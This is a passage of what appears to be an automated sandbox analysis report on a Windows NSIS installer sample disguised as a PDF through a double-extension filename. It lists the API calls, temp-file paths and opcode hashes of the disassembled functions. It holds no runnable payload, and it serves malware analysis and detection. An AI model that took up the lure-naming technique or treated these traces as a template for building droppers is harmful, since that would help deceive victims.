                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: verifying installer: %d%%
                              • API String ID: 1451636040-82062127
                              • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                              • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                              • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                              • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                              Function 701D2655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 701D12BB: GlobalAlloc.KERNELBASE(00000040,?,701D12DB,?,701D137F,00000019,701D11CA,-000000A0), ref: 701D12C5
                              • GlobalFree.KERNEL32(?), ref: 701D2743
                              • GlobalFree.KERNEL32(00000000), ref: 701D2778
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: c503894b4d132b21ddde19279870aeea9938559a083b659667525d39f039699b
                              • Instruction ID: 3e2ee2b380ad96b098af0ec7b5a96f8b53745145d117a45a8dd8e954f0cf4887
                              • Opcode Fuzzy Hash: c503894b4d132b21ddde19279870aeea9938559a083b659667525d39f039699b
                              • Instruction Fuzzy Hash: E931EB72606101EFC7268F65CDC4D6EBBBAFFA630032141ACF22293B60C771A805DB61
                              Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                              • GlobalFree.KERNEL32(?), ref: 00402A0B
                              • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                              • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                              • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                              • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                              Function 701D2480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalFree.KERNEL32(00000000), ref: 701D25C2
                                • Part of subcall function 701D12CC: lstrcpynW.KERNEL32(00000000,?,701D137F,00000019,701D11CA,-000000A0), ref: 701D12DC
                              • GlobalAlloc.KERNEL32(00000040), ref: 701D2548
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 701D2563
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 4216380887-0
                              • Opcode ID: da75791aeb56631e5f0c037c7e9e28949ce715b9a1abd7c37e7c2f27a86d110d
                              • Instruction ID: eee4e08b9257f905c0d5a20b3077acc08bcc9ab8e4311a12a73a74434c7d26ad
                              • Opcode Fuzzy Hash: da75791aeb56631e5f0c037c7e9e28949ce715b9a1abd7c37e7c2f27a86d110d
                              • Instruction Fuzzy Hash: CA41D1B1008305EFD714DF24E854E6E77B8FBA4310F2189ADF96687B80E770A544DB61
                              Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,?), ref: 00401D9F
                              • GetClientRect.USER32(?,?), ref: 00401DEA
                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                              • DeleteObject.GDI32(00000000), ref: 00401E3E
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                              • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                              • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                              • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                              Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • GetDC.USER32(?), ref: 00401E56
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                              • ReleaseDC.USER32(?,00000000), ref: 00401E89
                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              • API String ID: 3808545654-0
                              • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                              • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                              • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                              • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                              Function 701D16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701D22D8,?,00000808), ref: 701D16D5
                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,701D22D8,?,00000808), ref: 701D16DC
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701D22D8,?,00000808), ref: 701D16F0
                              • GetProcAddress.KERNEL32(701D22D8,00000000), ref: 701D16F7
                              • GlobalFree.KERNEL32(00000000), ref: 701D1700
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                              • String ID:
                              • API String ID: 1148316912-0
                              • Opcode ID: 07cfff070446c743bfaddb5a8fad57bcad8c9dab36af8524af47d762d0535845
                              • Instruction ID: c1ee385d68f92ca0bbaf2bd9488884392f4b28bbf1cf3922cf27838b8753da89
                              • Opcode Fuzzy Hash: 07cfff070446c743bfaddb5a8fad57bcad8c9dab36af8524af47d762d0535845
                              • Instruction Fuzzy Hash: F2F098732071387B962117A79C48DEBBF9CEF8B2F5B210365F728E25A086A15D0197F1
                              Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                              • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                              • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                              • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                              Function 00404D4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                              • wsprintfW.USER32 ref: 00404DF7
                              • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s
                              • API String ID: 3540041739-3551169577
                              • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                              • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                              • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                              • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                              Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000023,00000011,00000002), ref: 004024DA
                              • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,00000011,00000002), ref: 0040251A
                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,00000011,00000002), ref: 00402602
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CloseValuelstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\nsp919B.tmp
                              • API String ID: 2655323295-531844342
                              • Opcode ID: 8b31c99460fdf6c2949f4debf72b45d412ee72b0ef63aad6f5470ffe0bc1fffc
                              • Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
                              • Opcode Fuzzy Hash: 8b31c99460fdf6c2949f4debf72b45d412ee72b0ef63aad6f5470ffe0bc1fffc
                              • Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58
                              Function 00405EF8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405EA9
                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405F51
                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsp919B.tmp
                              • API String ID: 3248276644-607844214
                              • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                              • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                              • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                              • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                              Function 00405E9B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405EA9
                              • CharNextW.USER32(00000000), ref: 00405EAE
                              • CharNextW.USER32(00000000), ref: 00405EC6
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsp919B.tmp, xrefs: 00405E9C
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CharNext
                              • String ID: C:\Users\user\AppData\Local\Temp\nsp919B.tmp
                              • API String ID: 3213498283-531844342
                              • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                              • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                              • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                              • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                              Function 00405DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                              • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CharPrevlstrcatlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2659869361-3355392842
                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                              • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                              • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                              Function 701D10E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 701D1171
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 701D11E3
                              • GlobalFree.KERNEL32 ref: 701D124A
                              • GlobalFree.KERNEL32(?), ref: 701D129B
                              • GlobalFree.KERNEL32(00000000), ref: 701D12B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
